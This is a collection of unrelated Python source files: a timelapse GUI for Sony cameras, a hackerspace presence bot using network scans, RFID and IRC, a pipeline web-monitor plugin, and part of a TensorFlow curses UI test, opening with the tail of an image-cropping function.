upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2), upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH, opt.inputResW)
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
|
pylapse.py | import libsonyapi
from libsonyapi.actions import Actions
from libsonyapi.camera import Camera, ConnectionError
import tkinter as tk
from tkinter import messagebox
import threading
import time
import datetime
import os
pylapse_font = ("Trebuchet", 14)
class CustomLabel(tk.Label):
"""
defines a custom label used throughout pylapse
"""
def __init__(self, parent, **kwargs):
tk.Label.__init__(self, parent, **kwargs)
self.config(font=pylapse_font)
self.pack()
class PyLapse(tk.Tk):
"""
root window of pylapse, MainScreen is placed in this window
"""
def __init__(self):
super(PyLapse, self).__init__()
self.title("PyLapse")
class MainScreen(tk.Frame):
"""
MainScreen frame of pylapse, is placed in pylapse root window
"""
def __init__(self, parent):
"""
places the live view and timelapse frames
"""
tk.Frame.__init__(self, parent)
tk.Label(self, text="PyLapse", font=("Trebuchet", 20)).grid(row=1)
self.set_live_view()
self.set_timelapse_frame()
def set_live_view(self):
"""
contains widgets in live view section of MainScreen
"""
# TODO: implement live view, scrap controls,
live_view_frame = tk.Frame(self)
live_view_frame.grid(row=2)
live_view = tk.Frame(live_view_frame)
live_view.grid(row=1, column=1)
# CustomLabel(live_view, text = 'live view')
live_view_controls_frame = tk.Frame(live_view_frame)
live_view_controls_frame.grid(row=1, column=2)
# CustomLabel(live_view_controls_frame, text = 'controls')
self.camera_connect_button = tk.Button(
live_view_frame,
text="Connect to camera",
font=pylapse_font,
command=self.connect_to_camera,
)
self.camera_connect_button.grid(row=2, column=1, columnspan=2)
self.camera_connection_status = tk.Label(live_view_frame, font=pylapse_font)
self.camera_connection_status.grid(row=3, column=1, columnspan=2)
def set_timelapse_frame(self):
"""
contains widgets in the timelapse section of MainScreen
"""
timelapse_frame = tk.Frame(self)
timelapse_frame.grid(row=3)
timelapse_settings_frame = tk.Frame(timelapse_frame)
timelapse_settings_frame.grid(row=1, column=1)
CustomLabel(timelapse_settings_frame, text="TIMELAPSE SETTINGS")
CustomLabel(timelapse_settings_frame, text="FPS")
self.fps_scale = tk.Scale(
timelapse_settings_frame,
orient=tk.HORIZONTAL,
from_=0,
to=60,
sliderlength=10,
length=150,
tickinterval=10,
command=self.update_timelapse_info,
)
self.fps_scale.pack()
self.fps_scale.set(24)
CustomLabel(timelapse_settings_frame, text="Interval\n(max:10min 59sec)")
interval_frame = tk.Frame(timelapse_settings_frame, pady=5)
interval_frame.pack()
self.min_between_shots = tk.Spinbox(
interval_frame,
from_=0,
to=10,
width=2,
font=pylapse_font,
command=self.update_timelapse_info,
)
self.min_between_shots.grid(row=1, column=1)
min_label = tk.Label(interval_frame, text="min", font=pylapse_font)
min_label.grid(row=1, column=2)
self.sec_between_shot = tk.Spinbox(
interval_frame,
from_=0,
to=59,
width=2,
font=pylapse_font,
command=self.update_timelapse_info,
)
self.sec_between_shot.grid(row=1, column=3)
self.sec_between_shot.delete(0)
self.sec_between_shot.insert(0, 5)
sec_label = tk.Label(interval_frame, text="sec", font=pylapse_font)
sec_label.grid(row=1, column=4)
timelapse_duration_label = CustomLabel(
timelapse_settings_frame, text="Timelapse Duration"
)
timelapse_duration_frame = tk.Frame(timelapse_settings_frame)
timelapse_duration_frame.pack()
self.timelapse_duration_min = tk.Spinbox(
timelapse_duration_frame,
from_=0,
to=99,
width=2,
font=pylapse_font,
command=self.update_timelapse_info,
)
self.timelapse_duration_min.grid(row=1, column=1)
timelapse_duration_min_label = tk.Label(
timelapse_duration_frame, text="min", font=pylapse_font
)
timelapse_duration_min_label.grid(row=1, column=2)
self.timelapse_duration_sec = tk.Spinbox(
timelapse_duration_frame,
from_=0,
to=59,
width=2,
font=pylapse_font,
command=self.update_timelapse_info,
)
self.timelapse_duration_sec.grid(row=1, column=3)
self.timelapse_duration_sec.delete(0)
self.timelapse_duration_sec.insert(0, 10)
timelapse_duration_sec_label = tk.Label(
timelapse_duration_frame, text="sec", font=pylapse_font
)
timelapse_duration_sec_label.grid(row=1, column=4)
timelapse_info_frame = tk.Frame(timelapse_frame)
timelapse_info_frame.grid(row=1, column=2)
CustomLabel(timelapse_info_frame, text="TIMELAPSE INFO")
self.total_shots = CustomLabel(
timelapse_info_frame, text="Total Amount of Shots: ", pady=35
)
self.shoot_duration = CustomLabel(
timelapse_info_frame, text="Total Shooting Time: ", pady=35
)
self.update_timelapse_info()
start_button = tk.Button(
self, text="START TIMELAPSE", font=pylapse_font, command=self.confirm
)
start_button.grid(row=4)
def connect_to_camera(self):
"""
attempts connection to sony camera
"""
try:
self.camera_connection_status.config(text="Connecting to camera...")
self.camera = Camera()
self.camera.do(Actions.startRecMode)
self.camera_connection_status.config(
text="Successfully connected to " + self.camera.name
)
self.camera_connect_button.grid_forget()
except ConnectionError:
self.camera_connection_status.config(text="Connection to camera failed")
def get_params(self):
"""
returns: fps, min, sec, timelapse_duration, total_interval_in_sec, total_shots, shoot_duration
gets params from user input of MainScreen
"""
fps = int(self.fps_scale.get())
min = int(self.min_between_shots.get())
sec = int(self.sec_between_shot.get())
timelapse_duration = int(self.timelapse_duration_min.get()) * 60 + int(
self.timelapse_duration_sec.get()
)
total_interval_in_sec = min * 60 + sec
total_shots = timelapse_duration * fps
shoot_duration = total_shots * total_interval_in_sec
return (
fps,
min,
sec,
timelapse_duration,
total_interval_in_sec,
total_shots,
shoot_duration,
)
def update_timelapse_info(self, event=None):
"""
this is called whenever user changes fps, duration, interval value in MainScreen
calculates and updates the respective labels
"""
(
fps,
min,
sec,
timelapse_duration,
total_interval_in_sec,
total_shots,
shoot_duration,
) = self.get_params()
self.total_shots.config(
text="Total Amount of Shots:\n" + str(total_shots) + " shots"
)
self.shoot_duration.config(
text="Total Shooting Time:\n"
+ str(int(shoot_duration / 60))
+ " min "
+ str(shoot_duration % 60)
+ " sec"
)
def confirm(self):
"""
displays confirmation box, if yes: start timelapse, if no: nothing happens
"""
(
fps,
min,
sec,
timelapse_duration,
total_interval_in_sec,
total_shots,
shoot_duration,
) = self.get_params()
confirm_box = messagebox.askyesno(
"Start timelapse??",
"Do you want to start a timelapse with the following settings:\n\n"
+ str(fps)
+ " FPS with a "
+ str(min)
+ " min "
+ str(sec)
+ " sec interval"
+ ", which will make a "
+ str(timelapse_duration)
+ " second long timelapse\n\n"
+ "This timelapse will consist of "
+ str(total_shots)
+ " shots and will require "
+ str(int(shoot_duration / 60))
+ " min "
+ str((shoot_duration % 60))
+ " sec of total shooting time\n\n"
+ "Make sure you have set your camera to the desired settings!",
)
if confirm_box == True:
# initizate timelapse
timelapse = threading.Thread(
target=self.start_timelapse, args=(total_interval_in_sec, total_shots)
)
timelapse.daemon = True
timelapse.start()
# init timelapse progress checker
top = tk.Toplevel(width=1000)
top.title("Timelape in progress...")
self.start_time = datetime.datetime.now()
self.end_time = self.start_time + datetime.timedelta(seconds=shoot_duration)
self.progress_label = CustomLabel(top, text="Timelape in progress...")
self.shot_count = CustomLabel(top)
self.percent_done = CustomLabel(top)
CustomLabel(top, text="-" * 10)
self.time_elapsed = CustomLabel(top)
time_started = CustomLabel(
top, text="Time Started: " + self.start_time.strftime("%I:%M")
)
estimate_complete = CustomLabel(
top,
text="Estimated Time Completion: " + self.end_time.strftime("%I:%M"),
)
def stop_timelapse():
self.isrunning = False
top.destroy()
self.cancel_button = tk.Button(
top, text="Cancel Timelapse", font=pylapse_font, command=stop_timelapse
)
self.cancel_button.pack()
self.refresh_info_toplevel(
total_interval_in_sec, total_shots, shoot_duration
)
top.mainloop()
def start_timelapse(self, interval_in_sec, total_shots):
"""
starts timelapse with params: interval and total shots
"""
self.shots_taken = 0
self.isrunning = True
while self.shots_taken != total_shots and self.isrunning:
self.camera.do(Actions.actTakePicture)
time.sleep(interval_in_sec)
self.shots_taken += 1
self.isrunning = False
def refresh_info_toplevel(self, interval_in_sec, total_shots, shoot_duration):
"""
refresh timelapse info window until timelapse is completed
"""
if self.shots_taken < total_shots and self.isrunning:
(
fps,
min,
sec,
timelapse_duration,
total_interval_in_sec,
total_shots,
shoot_duration,
) = self.get_params()
self.shot_count.config(
text="Shots: " + str(self.shots_taken + 1) + "/" + str(total_shots)
)
self.percent_done.config(
text="Percent Completed: "
+ (str(int(((self.shots_taken + 1) / total_shots) * 100)) + "%")
)
self.time_elapsed.config(
text="Time Elapsed: "
+ str(datetime.datetime.now() - self.start_time).split(".")[0]
)
self.after(
1000,
self.refresh_info_toplevel,
total_interval_in_sec,
total_shots,
shoot_duration,
)
elif self.shots_taken == total_shots and not self.isrunning:
self.progress_label.config(text="TIMELAPSE COMPLETED!!")
self.cancel_button.pack_forget()
if __name__ == "__main__":
def resource_path(relative_path):
"""Get absolute path to resource, works for dev and for PyInstaller"""
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
# place MainScreen in pylapse root window and start mainloop
root = PyLapse()
root.iconbitmap(resource_path("releases\pylapse.ico"))
MainScreen(root).pack()
root.mainloop()
|
mac_kicker.py | #!/usr/bin/env python3
#
# MIT
# ciko@afra-berlin.de
# kookie@spacekookie.de
import asyncio
import datetime
import subprocess
import sys
import time
import threading
import evdev
import hashlib
import pydle
import requests
from rpi_ws281x import *
def mac_tester():
global current_mac_users, current_rfid_users
while True:
# Load the macs. in the loop for auto reload
macs = {}
with open("registered_macs", "r") as f:
for line in f.readlines():
if len(line.strip()) >= 2:
macs[line.split()[0].upper()] = line.split()[1]
# Scan for all macs in the current network
scan_result = subprocess.check_output(["nmap", "-sPn", "172.23.42.1-254"], universal_newlines=True)
current_mac_users = []
for line in scan_result.split("\n"):
words = line.split()
if len(words) >= 2:
if words[0] == "MAC":
mac_address = words[2].upper()
if mac_address in macs.keys():
current_mac_users.append(macs[mac_address])
current_mac_users = list(set(current_mac_users)) # Dont duplicate users
# If the door is closed, kill all RFID and IRC users
try:
if "LOCKED" in requests.get("http://door:8080/").text:
current_rfid_users = []
current_irc_users = []
except Exception:
pass # Ignore if the door is dead
time.sleep(60)
def find_rfid_user(authcode):
enc_authcode = hashlib.sha224(authcode.encode()).hexdigest().upper()
with open("registered_rfid", "r") as f:
tokenlines = f.readlines()
for line in tokenlines:
words = line.split()
if len(words) >= 2:
if words[0].upper() == enc_authcode:
return words[1]
return None
def rfid_watcher():
global current_rfid_users
rfid_reader = evdev.InputDevice('/dev/input/event0')
print("Connected to RFID Reader")
current_code = ""
keys = "XX1234567890XXXXqwertzuiopXXXXasdfghjklXXXXXyxcvbnmXXXXXXXXXXXXXXXXXXXXXXX"
# Read the keys
for event in rfid_reader.read_loop():
if event.type == 1 and event.value == 1: # Keyboard events
if event.code > len(keys):
continue
if keys[event.code] in "0123456789":
current_code += keys[event.code]
else:
rfid_user = find_rfid_user(current_code)
if not rfid_user:
continue
if rfid_user in current_rfid_users:
current_rfid_users.remove(rfid_user)
color_rotate(Color(255, 0, 0))
speak("Goodbye {}".format(rfid_user))
else:
current_rfid_users.append(rfid_user)
color_rotate(Color(0, 255, 0))
speak("Welcome {}".format(rfid_user))
current_code = ""
def register_here(nick):
global current_irc_users
if nick not in current_irc_users:
current_irc_users.append(nick)
color_rotate(Color(0, 255, 0))
speak("Welcome {}".format(nick))
def register_gone(nick):
global current_irc_users
if nick in current_irc_users:
current_irc_users.remove(nick)
color_rotate(Color(255, 0, 0))
speak("Goodbye {}".format(nick))
def speak(text):
threading.Thread(target=t_speak, args=(text,)).start()
def t_speak(text):
subprocess.run(["pico2wave" ,"--lang", "en-US", "--wave", "/tmp/tts.wav", "\"{}\"".format(text)])
subprocess.run(["aplay", "-D", "plughw:CARD=Device,DEV=0", "/tmp/tts.wav"])
subprocess.run(["rm", "/tmp/tts.wav"])
def register_eta(user, message):
# .eta 10min (arrives in 10 minutes)
global current_eta_users
message_parts = message.split()
if len(message_parts) != 2: return False # Skip invalid messages
if "min" in message_parts[1]:
try:
until_arrival = datetime.timedelta(minutes=int(message_parts[1].replace("min", "")))
arrival_time = datetime.datetime.now() + until_arrival
except TypeError:
return False
except ValueError:
return False
elif ":" in message_parts[1]:
time = datetime.datetime.strptime(message_parts[1], '%H:%M')
arrival_time = datetime.datetime.now().replace(hour = time.hour, minute = time.minute)
else:
time = datetime.datetime.strptime(message_parts[1], '%H%M')
arrival_time = datetime.datetime.now().replace(hour = time.hour, minute = time.minute)
arrival_time = datetime.datetime.now() + until_arrival
current_eta_users[user] = arrival_time
speak("{} will arrive at {}".format(user, arrival_time.strftime("%H %M")))
return True
def get_version():
try:
version = subprocess.check_output(["git", "rev-parse", "HEAD"])
return version.decode('ascii').strip()
except CalledProcessError:
return "<unknown>"
def get_formatted_eta_users():
global current_eta_users
formatted_eta_users = []
now = datetime.datetime.now()
for user, time in current_eta_users.items():
if time < now:
current_eta_users.remove(user)
else:
formatted_eta_users.append("{} ({})".format(user, time.strftime("%H:%M")))
return formatted_eta_users
def self_register_mac(nick, message):
message_parts = message.split()
if len(message_parts) != 3: return False# Skip invalid messages
mac = message_parts[2]
if len(mac.split(":")) != 6 or len(mac) != 17: return False # Skip non-Macs
with open("registered_macs", "a") as f:
f.write("\n" + mac + " " + nick)
return True
def self_remove_mac(nick, message):
message_parts = message.split()
if len(message_parts) != 3: return False # Skip invalid messages
mac = message_parts[2]
if len(mac.split(":")) != 6 or len(mac) != 17: return False # Skip non-Macs
with open("registered_macs", "r") as f:
mac_lines = f.readlines()
with open("registered_macs", "w") as f:
for mac_line in mac_lines:
if mac.upper() not in mac_line.upper():
f.write(mac_line)
return True
def color_rotate(colors, rotations=1):
threading.Thread(target=t_color_rotate, args=(colors, rotations,)).start()
def t_color_rotate(colors, rotations):
for i in range(0, strip.numPixels()):
strip.setPixelColor(i, colors)
strip.setPixelColor((i+1)%LED_COUNT, Color(0,0,0))
strip.show()
time.sleep(0.1)
for i in range(1, strip.numPixels()):
strip.setPixelColor(i, Color(0,0,0))
strip.show()
time.sleep(0.1)
class MyOwnBot(pydle.Client):
@asyncio.coroutine
def on_connect(self):
yield from self.join('#afra')
@asyncio.coroutine
def on_message(self, target, source, message):
global current_mac_users, current_rfid_users, current_eta_users, current_irc_users
current_users = list(set(current_mac_users + current_rfid_users + current_irc_users))
# don't respond to our own messages, as this leads to a positive feedback loop
if source != self.nickname:
if message.startswith(".presence") or message.startswith(".present"):
formatted_eta_users = get_formatted_eta_users()
if len(current_users) == 0 and len(formatted_eta_users) == 0:
yield from self.message(target, "Nobody wants to be surveilled.")
elif len(current_users) > 0:
yield from self.message(target, "Now at AfRA: " + ", ".join(current_users))
if len(formatted_eta_users) > 0:
yield from self.message(target, "Soon to arrive: " + ", ".join(formatted_eta_users))
elif message.startswith(".eta"):
register_eta(source, message)
yield from self.message(target, "Noted!")
elif message.startswith(".here") or message.startswith(".da"):
register_here(source)
elif message.startswith(".gone") or message.startswith(".weg"):
register_gone(source)
elif message.startswith(".clear"):
current_mac_users = []
current_rfid_users = []
current_eta_users = {}
yield from self.message(target, "Cleared")
elif message.startswith(".purge"):
current_irc_users = []
current_mac_users = []
current_rfid_users = []
current_eta_users = {}
yield from self.message(target, "...")
elif message.startswith(".version"):
yield from self.message(target, get_version())
@asyncio.coroutine
def on_private_message(self, target, source, message):
if source in self._nicknames: # Dont react to yourself
return
if message.startswith(".eta"):
if register_eta(source, message):
yield from self.message(source, "Got it, see you")
else:
yield from self.message(source, "Sorry, I did not understand this. Please use: .eta XXmin")
elif message.startswith(".here") or message.startswith(".da"):
register_here(source)
yield from self.message(source, "Welcome, you can log out via .gone")
elif message.startswith(".gone") or message.startswith(".weg"):
register_gone(source)
yield from self.message(source, "Goodbye")
elif message.startswith(".register mac"):
if self_register_mac(source, message):
yield from self.message(source, "MAC registered, the update can take up to 1 minute")
else:
yield from self.message(source, "Sorry, I did not understand this. Please use: .register mac MAC_ADDRESS")
elif message.startswith(".remove mac"):
if self_remove_mac(source, message):
yield from self.message(source, "MAC removed, the update can take up to 1 minute")
else:
yield from self.message(source, "Sorry, I did not understand this. Please use: .remove mac MAC_ADDRESS")
else:
yield from self.message(source, "Sorry, I did not understand. Reference: https://www.afra-berlin.de/dokuwiki/doku.php?id=projekte:pr3s3nce")
current_mac_users = []
current_rfid_users = []
current_eta_users = {}
current_irc_users = []
threading.Thread(target=mac_tester).start()
threading.Thread(target=rfid_watcher).start()
# LED strip configuration:
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 10 # GPIO pin connected to the pixels (must support PWM!).
LED_CHANNEL = 1 # PWM Channel must correspond to chosen LED_PIN PWM!
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 100 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
strip.begin()
try:
client = MyOwnBot("pr3s3nce", realname="AfRA attendance bot")
client.run('chat.freenode.net', tls=True, tls_verify=False)
finally:
sys.exit(1)
|
__init__.py | """Web client to monitor pipeline processes for PyPPL"""
from threading import Thread
from pathlib import Path
from flask_socketio import SocketIO
from diot import Diot
from pyppl.plugin import hookimpl
from pyppl.logger import Logger
from pyppl.config import config
from .shared import (logger, PLUGIN, DEFAULT_PORT, DEFAULT_THEME,
SOCKETIO_DEBUG, DEFAULT_KEEPALIVE,
pipeline_data)
from .app import create_app
from .sockets import create_socket
from .utils import auto_port, PipelineData
# pylint: disable=unused-argument,no-self-use
__version__ = "0.0.2"
class PyPPLWeb:
"""Web client to monitor pipeline processes for PyPPL"""
__version__ = __version__
def __init__(self):
self.port = None
self.thread = None
self.namespace = None
self.app = None
self.socketio = None
self.pdata = pipeline_data
self.setup()
def start_server(self):
"""Start the socket server with given config"""
logger.info(f"Launching web server at port {self.port} ...")
try:
self.socketio.run(self.app, port=self.port,
debug=config.config.web_debug)
except OSError as ex:
logger.error(f'Failed to start server: {ex}')
def setup(self):
"""Setup the plugin"""
config.config.web_port = DEFAULT_PORT
config.config.web_debug = SOCKETIO_DEBUG
config.config.web_keepalive = DEFAULT_KEEPALIVE
config.config.web_theme = DEFAULT_THEME
@hookimpl
def pyppl_init(self, ppl):
"""Get the port"""
self.port = (int(config.config.web_port)
if config.config.web_port != 'auto'
else auto_port())
self.app = create_app(config.config.web_theme)
self.socketio, self.namespace = create_socket(self.app)
@hookimpl
def pyppl_prerun(self, ppl):
"""Try to start the server in a thread"""
# construct initial pipeline data for rendering
self.pdata = PipelineData(ppl)
self.pdata.assemble()
# attach this to pipeline_data for sockets
pipeline_data.pipeline = self.pdata
# More detailed data for tab rendering
pipeline_data.procs = {}
#
# This should be the same as using standard threading.Thread,
# as we are using async_mode='threading'
self.thread = Thread(target=self.start_server)
# allow thread to stop together with mean thread
self.thread.daemon = True
self.thread.start()
@hookimpl
def pyppl_postrun(self, ppl):
"""Try to keep alive of the server
if config.config.web_keepalive is True"""
if not config.config.web_keepalive:
return
if config.config.web_keepalive is True:
logger.info(f"Web server is still alive at port {self.port}, "
"use <Ctrl+C> to quit.")
logger.info("Pending for connection ...")
elif self.namespace.count > 0:
logger.info(f"Web server is still alive at port {self.port}, "
f"clients connected: {self.namespace.count}")
else:
logger.warning("Web server is stopping as well, "
"since no clients connected.")
# .stop only works with context
#socketio.stop()
# we just leave it to exit, since our thread is daemonic
return
self.thread.join()
@hookimpl
def proc_prerun(self, proc):
"""Initialize a proc"""
self.pdata.update_node(proc, 'init')
self.socketio.emit('pipeline_update', self.pdata.node_data(proc))
# init proc data
pipeline_data.procs[proc.shortname] = Diot()
procdata = pipeline_data.procs[proc.shortname]
procdata.jobs = [['', ''] for _ in range(proc.size)]
procdata.status = self.pdata.node_data(proc).get('status', '')
procdata.props = {
key: str(getattr(proc, key))
for key in list(proc._setcounter) + ['workdir', 'size']
}
procdata.props.workdir_abs = str(Path(procdata.props.workdir).resolve())
procdata.args = {key: str(val) for key, val in proc.args.items()}
procdata.envs = {key: str(val) for key, val in proc.envs.items()}
procdata.config = {key: str(val) for key, val in proc.config.items()}
procdata.watch = False
procdata.proc = proc.shortname
@hookimpl
def proc_postrun(self, proc, status):
"""Update the status of the whole proc"""
self.pdata.update_node(proc, status)
self.socketio.emit('pipeline_update', self.pdata.node_data(proc))
@hookimpl
def job_build(self, job):
"""Init some data for pipeline_data.procs"""
procdata = pipeline_data.procs[job.proc.shortname]
procdata.jobs[job.index] = ['init', job.rc]
if procdata.watch:
self.socketio.emit('job_status_change',
{'proc': job.proc.shortname,
'job': job.index, # 0-based
'rc': job.rc,
'status': 'init'})
if procdata.status == '':
# just in case tab of the proc has not init'ed
procdata.status = 'init'
self.socketio.emit('tab_proc_init_resp', procdata)
@hookimpl
def job_poll(self, job, status):
"""Tell pipeline_data.procs that I am running"""
if status == 'running':
procdata = pipeline_data.procs[job.proc.shortname]
prev_status = procdata.jobs[job.index][0]
procdata.jobs[job.index][0] = status
# only send once
if procdata.watch and prev_status != 'running':
self.socketio.emit('job_status_change',
{'proc': job.proc.shortname,
'job': job.index,
'rc': job.rc,
'status': status})
@hookimpl
def job_done(self, job, status):
"""Update status on the client"""
self.pdata.update_node(job.proc, status)
nodedata = self.pdata.node_data(job.proc)
self.socketio.emit('pipeline_update', nodedata)
procdata = pipeline_data.procs[job.proc.shortname]
procdata.status = nodedata.get('status', procdata.status)
procdata.jobs[job.index][0] = status
procdata.jobs[job.index][1] = job.rc
if procdata.watch:
self.socketio.emit('job_status_change',
{'proc': job.proc.shortname,
'job': job.index,
'rc': job.rc,
'status': status})
PYPPLWEB = PyPPLWeb()
|
curses_ui_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests of the curses-based CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import curses
import tempfile
import threading
import numpy as np
from six.moves import queue
from tensorflow.python.debug.cli import curses_ui
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.debug.cli import tensor_format
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
def string_to_codes(cmd):
return [ord(c) for c in cmd]
def codes_to_string(cmd_code):
# Omit non-ASCII key codes.
return "".join([chr(code) for code in cmd_code if code < 256])
class MockCursesUI(curses_ui.CursesUI):
"""Mock subclass of CursesUI that bypasses actual terminal manipulations."""
def __init__(self,
height,
width,
command_sequence=None):
self._height = height
self._width = width
self._command_sequence = command_sequence
self._command_counter = 0
# The mock class has no actual textbox. So use this variable to keep
# track of what's entered in the textbox on creation.
self._curr_existing_command = ""
# Observers for test.
# Observers of screen output.
self.unwrapped_outputs = []
self.wrapped_outputs = []
self.scroll_messages = []
self.output_array_pointer_indices = []
self.output_pad_rows = []
# Observers of command textbox.
self.existing_commands = []
# Observer for tab-completion candidates.
self.candidates_lists = []
# Observer for the main menu.
self.main_menu_list = []
# Observer for toast messages.
self.toasts = []
curses_ui.CursesUI.__init__(self)
# Override the default path to the command history file to avoid test
# concurrency issues.
self._command_history_store = debugger_cli_common.CommandHistory(
history_file_path=tempfile.mktemp())
# Below, override the _screen_ prefixed member methods that interact with the
# actual terminal, so that the mock can run in a terminal-less environment.
# TODO(cais): Search for a way to have a mock terminal object that behaves
# like the actual terminal, so that we can test the terminal interaction
# parts of the CursesUI class.
def _screen_init(self):
pass
def _screen_refresh_size(self):
self._max_y = self._height
self._max_x = self._width
def _screen_launch(self, enable_mouse_on_start):
self._mouse_enabled = enable_mouse_on_start
def _screen_terminate(self):
pass
def _screen_refresh(self):
pass
def _screen_create_command_window(self):
pass
def _screen_create_command_textbox(self, existing_command=None):
"""Override to insert observer of existing commands.
Used in testing of history navigation and tab completion.
Args:
existing_command: Command string entered to the textbox at textbox
creation time. Note that the textbox does not actually exist in this
mock subclass. This method only keeps track of and records the state.
"""
self.existing_commands.append(existing_command)
self._curr_existing_command = existing_command
def _screen_new_output_pad(self, rows, cols):
return "mock_pad"
def _screen_add_line_to_output_pad(self, pad, row, txt, color_segments=None):
pass
def _screen_draw_text_line(self, row, line, attr=curses.A_NORMAL, color=None):
pass
def _screen_scroll_output_pad(self, pad, viewport_top, viewport_left,
screen_location_top, screen_location_left,
screen_location_bottom, screen_location_right):
pass
def _screen_get_user_command(self):
command = self._command_sequence[self._command_counter]
self._command_key_counter = 0
for c in command:
if c == curses.KEY_RESIZE:
# Special case for simulating a terminal resize event in curses.
self._height = command[1]
self._width = command[2]
self._on_textbox_keypress(c)
self._command_counter += 1
return ""
elif c == curses.KEY_MOUSE:
mouse_x = command[1]
mouse_y = command[2]
self._command_counter += 1
self._textbox_curr_terminator = c
return self._fetch_hyperlink_command(mouse_x, mouse_y)
else:
y = self._on_textbox_keypress(c)
self._command_key_counter += 1
if y == curses_ui.CursesUI.CLI_TERMINATOR_KEY:
break
self._command_counter += 1
# Take into account pre-existing string automatically entered on textbox
# creation.
return self._curr_existing_command + codes_to_string(command)
def _screen_getmouse(self):
output = (0, self._mouse_xy_sequence[self._mouse_counter][0],
self._mouse_xy_sequence[self._mouse_counter][1], 0,
curses.BUTTON1_CLICKED)
self._mouse_counter += 1
return output
def _screen_gather_textbox_str(self):
return codes_to_string(self._command_sequence[self._command_counter]
[:self._command_key_counter])
def _scroll_output(self, direction, line_index=None):
"""Override to observe screen output.
This method is invoked after every command that generates a new screen
output and after every keyboard triggered screen scrolling. Therefore
it is a good place to insert the observer.
Args:
direction: which direction to scroll.
line_index: (int or None) Optional line index to scroll to. See doc string
of the overridden method for more information.
"""
curses_ui.CursesUI._scroll_output(self, direction, line_index=line_index)
self.unwrapped_outputs.append(self._curr_unwrapped_output)
self.wrapped_outputs.append(self._curr_wrapped_output)
self.scroll_messages.append(self._scroll_info)
self.output_array_pointer_indices.append(self._output_array_pointer_indices)
self.output_pad_rows.append(self._output_pad_row)
def _display_main_menu(self, output):
curses_ui.CursesUI._display_main_menu(self, output)
self.main_menu_list.append(self._main_menu)
def _screen_render_nav_bar(self):
pass
def _screen_render_menu_pad(self):
pass
def _display_candidates(self, candidates):
curses_ui.CursesUI._display_candidates(self, candidates)
self.candidates_lists.append(candidates)
def _toast(self, message, color=None, line_index=None):
curses_ui.CursesUI._toast(self, message, color=color, line_index=line_index)
self.toasts.append(message)
class CursesTest(test_util.TensorFlowTestCase):
_EXIT = string_to_codes("exit\n")
def _babble(self, args, screen_info=None):
ap = argparse.ArgumentParser(
description="Do babble.", usage=argparse.SUPPRESS)
ap.add_argument(
"-n",
"--num_times",
dest="num_times",
type=int,
default=60,
help="How many times to babble")
ap.add_argument(
"-l",
"--line",
dest="line",
type=str,
default="bar",
help="The content of each line")
ap.add_argument(
"-k",
"--link",
dest="link",
action="store_true",
help="Create a command link on each line")
ap.add_argument(
"-m",
"--menu",
dest="menu",
action="store_true",
help="Create a menu for testing")
parsed = ap.parse_args(args)
lines = [parsed.line] * parsed.num_times
font_attr_segs = {}
if parsed.link:
for i in range(len(lines)):
font_attr_segs[i] = [(
0,
len(lines[i]),
debugger_cli_common.MenuItem("", "babble"),)]
annotations = {}
if parsed.menu:
menu = debugger_cli_common.Menu()
menu.append(
debugger_cli_common.MenuItem("babble again", "babble"))
menu.append(
debugger_cli_common.MenuItem("ahoy", "ahoy", enabled=False))
annotations[debugger_cli_common.MAIN_MENU_KEY] = menu
output = debugger_cli_common.RichTextLines(
lines, font_attr_segs=font_attr_segs, annotations=annotations)
return output
def _print_ones(self, args, screen_info=None):
ap = argparse.ArgumentParser(
description="Print all-one matrix.", usage=argparse.SUPPRESS)
ap.add_argument(
"-s",
"--size",
dest="size",
type=int,
default=3,
help="Size of the matrix. For example, of the value is 3, "
"the matrix will have shape (3, 3)")
parsed = ap.parse_args(args)
m = np.ones([parsed.size, parsed.size])
return tensor_format.format_tensor(m, "m")
def testInitialization(self):
ui = MockCursesUI(40, 80)
self.assertEqual(0, ui._command_pointer)
self.assertEqual([], ui._active_command_history)
self.assertEqual("", ui._pending_command)
def testCursesUiInChildThreadStartsWithoutException(self):
result = queue.Queue()
def child_thread():
try:
MockCursesUI(40, 80)
except ValueError as e:
result.put(e)
t = threading.Thread(target=child_thread)
t.start()
t.join()
self.assertTrue(result.empty())
def testRunUIExitImmediately(self):
"""Make sure that the UI can exit properly after launch."""
ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
ui.run_ui()
# No screen output should have happened.
self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIEmptyCommand(self):
"""Issue an empty command then exit."""
ui = MockCursesUI(40, 80, command_sequence=[[], self._EXIT])
ui.run_ui()
# Empty command should not lead to any screen output.
self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIInvalidCommandPrefix(self):
"""Handle an unregistered command prefix."""
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("foo\n"), self._EXIT])
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(1, len(ui.unwrapped_outputs))
